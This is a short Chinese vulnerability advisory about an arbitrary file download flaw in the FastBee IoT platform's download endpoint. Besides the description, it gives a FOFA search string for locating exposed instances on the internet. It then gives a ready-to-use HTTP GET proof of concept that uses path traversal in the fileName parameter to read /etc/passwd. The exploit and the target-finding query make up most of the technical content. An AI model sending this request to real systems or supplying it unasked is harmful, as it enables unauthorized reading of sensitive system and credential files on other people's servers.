蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞

日期: 2024-09-02 | 影响软件: 蜂信物联FastBee | POC: 已公开

漏洞描述

FastBee是一款简单易用的开源物联网平台，适合中小企业和个人学习使用。适用于智能家居、智慧办公、智慧社区、农业监测、水利监测、工业控制等。蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。

PoC代码

# 蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞



蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。



## fofa



```javascript

"fastbee"

```



## poc



```javascript

GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1

Host:

Accept-Encoding: gzip, deflate, br

```

相关漏洞推荐